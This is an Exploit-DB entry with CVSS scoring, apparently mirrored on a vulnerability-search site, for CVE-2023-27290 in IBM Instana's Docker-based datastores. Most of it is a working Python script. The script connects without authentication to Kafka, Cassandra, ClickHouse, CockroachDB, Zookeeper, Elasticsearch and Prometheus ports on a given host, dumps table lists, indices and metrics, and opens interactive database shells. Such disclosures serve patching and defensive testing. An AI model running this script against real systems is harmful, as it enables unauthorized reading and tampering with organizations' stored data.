Lucene search

K
exploitdbShahid Parvez (zippon)EDB-ID:51314
HistoryApr 07, 2023 - 12:00 a.m.

Docker based datastores for IBM Instana 241-2 243-0 - No Authentication

2023-04-0700:00:00
Shahid Parvez (zippon)
www.exploit-db.com
100
exploit
docker
ibm instana
no authentication
cve-2023-27290
datastores
data security

CVSS3

9.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

AI Score

9.6

Confidence

High

EPSS

0.001

Percentile

43.9%

# Exploit Title: Docker based datastores for IBM Instana 241-2 243-0 - No Authentication 
# Google Dork: [if applicable]
# Date: 06 March 2023
# Exploit Author: Shahid Parvez (zippon)
# Vendor Homepage: https://www.instana.com/trial/ *and* https://www.ibm.com/docs/en/instana-observability
# Software Link: https://www.ibm.com/docs/en/instana-observability/current?topic=premises-operations-docker-based-instana
# Version: [Vulnerable version : 239-0 to 239-2 241-0 to 241-2 243-0] (REQUIRED Version : 241-3)
# Tested on: [Mac os]
# CVE : CVE-2023-27290
import argparse
import subprocess
import pexpect

# Define the available options and their corresponding commands
COMMANDS = {
    "kafka": "kafka-topics --bootstrap-server {host}:{port} --list --exclude-internal",
    "cassandra": "/bin/bash -c 'cqlsh {host} {port} && exit'",
    "clickhouse": 'curl --insecure "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"',
    "cockroach": "cockroach sql --host {host}:{port} --insecure",
    "zookeeper": "echo dump |ncat {host} {port}",
    "node-export": "curl http://{host}:{port}",
    "elasticsearch": "curl http://{host}:{port}/_cat/indices?v",
    "prometheus": "curl http://{host}:{port}/metrics",
    "clickhouse": 'wget -O system_tables.csv "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"'
}

# Define the parser for command-line arguments
parser = argparse.ArgumentParser(description="Script to run various commands on a host.")
parser.add_argument("host", help="The host IP address")
parser.add_argument("option", choices=COMMANDS.keys(), help="Select an option")
parser.add_argument("--port", type=int, default=None, help="The port number (default: use default port for the selected option)")
parser.add_argument("--output", help="Output the result to a file")
parser.add_argument("--verbose", action="store_true", help="Print the command line that was executed")

# Parse the command-line arguments
args = parser.parse_args()

# Determine the port number to use
if args.port is None:
    if args.option == "cassandra":
        port = "9042"
    elif args.option == "clickhouse":
        port = "8123"
    elif args.option == "cockroach":
        port = "26257"
    elif args.option == "elasticsearch":
        port = "9200"
    elif args.option == "kafka":
        port = "9092"
    elif args.option == "node-export":
        port = "8181"
    elif args.option == "prometheus":
        port = "9090"
    elif args.option == "zookeeper":
        port = "2181"
else:
    port = str(args.port)

# Build the command to execute
command = COMMANDS[args.option].format(host=args.host, port=port)

# Print the command line if verbose option is provided
if args.verbose:
    print(f"Executing command: {command}")

# If cassandra or cockroach option is selected, use pexpect to communicate inside the interactive shell
if args.option == "cassandra":
    child = pexpect.spawn(command)
    child.expect("Connected to.*", timeout=10)
    child.interact()
    output = child.before
elif args.option == "cockroach":
    child = pexpect.spawn(command)
    child.expect("root@.*:", timeout=10)
    child.interact()
    output = child.before
# If any other option is selected, execute the command and capture the output
else:
    output = subprocess.check_output(command, shell=True)

# If an output file is provided, write the output to the file
if args.output:
    with open(args.output, "wb") as f:
        f.write(output)

# Print the output to the console
print(output.decode())

CVSS3

9.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

AI Score

9.6

Confidence

High

EPSS

0.001

Percentile

43.9%